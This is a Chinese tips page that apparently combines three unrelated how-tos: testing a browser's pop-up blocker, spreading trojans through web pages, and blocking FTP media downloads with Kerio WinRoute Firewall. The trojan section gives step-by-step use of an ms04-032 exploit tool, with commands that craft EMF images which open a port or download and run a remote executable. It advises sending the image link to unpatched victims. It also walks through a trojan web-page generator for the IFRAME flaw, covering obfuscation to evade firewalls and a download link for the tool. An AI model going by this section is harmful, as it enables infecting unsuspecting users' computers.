如何禁止弹出广告
弹出的广告窗口实在烦人,因此,现在很多浏览器产品纷纷推出封杀广告窗口功能。例如TT、Maxthon、GreenBrowser、Opera等。但是,我们在使用这些浏览器或是广告封杀程序时,时不时还会弹出一两个广告窗口。今天笔者就教大家一招来检测自己的浏览器或广告封杀程序的广告封杀能力到底有多强,是不是百分百的称职。
Step1:打开你要检测的浏览器,下面笔者就以腾讯浏览器Tencent Traveler(下文简称TT)为例来介绍。然后在地址栏中输入http://www.kephyr.com/popupkillertest/并回车打开检测页面,然后点击其中的“Test”链接。
Step2:在切换到检测向导的页面中点击“Start Test”链接进入一共21种不同弹出窗口的检测向导的第一步,如图所示:
当你进入如图所示的页面中时,网站会自动弹出一个广告窗口,如果你的浏览器或是广告封杀程序能够将它封杀,你就不会看到弹出的窗口,如果你的浏览器或是广告封杀程序无法对付这种类型的弹出广告窗口,你将会看到显示“A bad pop up!It should be closed by your pop-up killer.”的页面。
整个测试过程一共是21步,也对应着21种情况下弹出的广告窗口。WWW.iTcOmPUTEr.cOM.cN例如:普通弹出广告窗口,询问是否将当前页设为你的主页弹出窗口,是否将当前页添加到浏览器的书签中的弹出窗口,弹出的Flash广告窗口等。另外,有的时候,一些弹出窗口是有用的,例如多窗口浏览器点击链接后打开的新窗口,这个窗口是正常的弹出窗口,一般浏览器本身是不会封杀的,最主要就是那些第三方广告封杀程序经常会误封杀。而测试向导也会对这种情况下的广告封杀程序进行检测。如果是正常的话,将会打开显示“A useful pop up! Should NOT be closed by your pop up killer.”的页面。
如果测试向导在测试这类型的弹出窗口时,广告封杀程序将它封杀了,那你必须重新设置程序的封杀参数了,否则将会影响你正常地使用浏览器浏览网页了。
提示:检测向导在检测时,还会在提示窗口中提示哪些浏览器可以在不安装第三方广告封杀程序的情况下,会自行屏蔽该类弹出窗口。
最后,如果你使用的浏览器的广告封杀能力太弱,而又没安装第三方广告封杀程序,检测网站上也提供了一些广告封杀程序的下载链接,你可以直接从上面下载并安装。另外,比较好用的一些第三方的广告封杀程序也有不少:http://www.skycn.com/soft/9355.html可以下载的“兰陵弹出广告克星”,http://www.skycn.com/soft/11920.html可以下载的“弹出广告终极杀手”等。而直接具有广告封杀功能的浏览器也有不少:TT、Opera,Maxthon、Mozilla 、Netscape等,它们自身对弹出广告的封杀能力相当强大,使用它们就不用再安装第三方广告封杀程序了,非常方便!
如何传播木马
各式各样的木马程序之所以会在网络上横行,网页传播是功不可没的。相对于其他传播途径,网页传播的危害面非常广泛,而IE层出不穷的漏洞也使很多朋友在不知不觉中中招。这一期的木马屠城,笔者就针对如何传播木马这一问题,对最近较经典的网页木马传播方式进行剖析,让大家知道这些“夹心”网页中的木马是怎样将用户杀于无形之中的。
图形渲染漏洞
大家可曾想过浏览一个图片文件就会中木马,并且还不是以前的那种以“.JPEG”结尾的木马,因为Windows又给黑客们爆出了一个更新的可利用漏洞。(本文为WWW.SQ120.COM电脑知识网推荐文章)
在Windows XP SP1、Windows Server 2003、Windows 2000 SP4中,系统对Windows图像文件(WMF)和增强型图像文件(EMF)图像格式进行的渲染存在一个远程代码执行漏洞,它使得恶意攻击者可以在受影响的系统上执行远程代码。漏洞的利用十分简单,我们只需要使用ms04-032溢出程序即可生成带溢出效果的EMF图片。
进入命令提示符窗口,输入格式为“ms04-32.exe <生成的文件名> <生成方式> <端口号(溢出方式①)/下载程序地址(溢出方式②)>”的命令。
提示:溢出方式可分为“1-端口方式溢出”和“2-下载溢出”。
例如输入“ms04-32 1.emf 1 21”,这样就生成了一个可以打开21端口的EMF图片(图1)。图1
提示:输入“ms04-32 test.emf 2 http://www.xxx.xxx/xxx.exe”,就生成了一个可以自动在http://www.xxx.xxx/xxx.exe下载并自动运行xxx.exe这个程序的EMF图片。
现在只要把此图片上传到自己的空间,然后将图片地址发给对方,没有及时更新补丁的用户看了图片后就会在不知情的情况下中招。
IFRAME溢出型木马
在这里笔者要给大家介绍的是如何让对方通过访问一个看似平常的网页,而不知不觉地中木马。这是网页木马传播最主要的途径,因为看似平常的网页浏览,也会带来很多严重的后果。
当IFRAME溢出公布后,网上就有高手针对已经公布的恶意代码进行了修改并写成了专门的木马生成器,使得它能顺利地工作在Windows 98、Windows Me、Windows 2000、Windows XP SP1(IE6)等系统下。由于它的危害很大,安装了IE6的电脑会受到iFrame漏洞的影响(不包括已升级到Windows XP SP2的系统)。
运行wymmpro.exe程序后,出现如图2所示的界面。首先在第一行填入已准备好的木马程序路径(网络路径),接下来在第二栏中选择IE的弹出方式和自定义生成的木马网页名。建议大家选择第一项,这样就可防止某些系统拦截所弹出的窗口。
图2
接下来在第三栏中选择默认的大内存方式(用于网页木马)。为了防止对方使用的是IE5.0/5.5而不会中招,我们可以在此生成CHM木马来达到传播的目的,我们只需要把准备好的木马程序放到木马生成器的CHM目录下,并根据提示填写好木马程序名和欲生成的CHM文件名以及用来存放该CHM的网络地址即可。
最后就是包装工作,我们可以选择对生成的网页木马代码进行压缩或加密,防止被带网页代码监控功能的防火墙拦截。现在,一个活生生的网页木马就制作好了。
软件下载地址:http://www.sixvee.com/520yy/tools/cytkk-3.rar
FTP下载权限如何管理
公司网络堵住了BT下载,有些聪明的同事又会开始使用FTP工具下载影音文件。这种下载方式同样会占用大量的网络带宽资源,影响其他员工正常办公。但由于工作需要,还不能完全禁止使用FTP下载,这里笔者只想限制用户下载影音文件。要达到这个目的其实很简单,利用KWF(Kerio WinRoute Firewall)防火墙就可实现。
下载地址:http://www2.skycn.com/soft/13276.html
制定禁止规则
在网关服务器中,登录到KWF控制台窗口,依次展开“Configuration→Content Filtering→FTP Policy”选项,进入到“FTP Policy”配置框。点击“Add”按钮后,弹出“FTP Rule”设置对话框。
切换到“General”标签页,在“Description”栏中为规则起个名,如“禁止下载影音文件”;接着在“If user accessing the FTP server is”框中选择“any user”单选项,在“And the FTP server is”框中选择“any server”单选项;在“Action”框中选择“Deny”单选项。
然后切换到“Advanced”标签页,在“Vaild at time interval”下拉列表中选择“Always”,在“ Valid for IP address group”下拉列表中选择“any”。
限制影音文件
下面进入到该规则设置的最关键步骤。在“Content”框中的“Type”下拉列表框中选择“Download”单选项,然后在“File name”栏中填写要禁止FTP方式下载的影音文件类型,如这里笔者输入“*.avi,*.mpeg,*.mpg,*.rm,*.ram”(见图),注意:多个影音文件类型间使用逗号隔开,接着点击“OK”按钮完成“禁止下载影音文件”规则设置。最后在“FTP Policy”配置框中点击“Apply”按钮使该规则生效。
这样一来,用户就无法使用FTP工具下载影音文件了。要是你发现还有漏网之鱼,如有用户还可以下载“*.dat”类型的影音文件,这时只要将“*.dat”文件类型加入到“File name”栏中即可。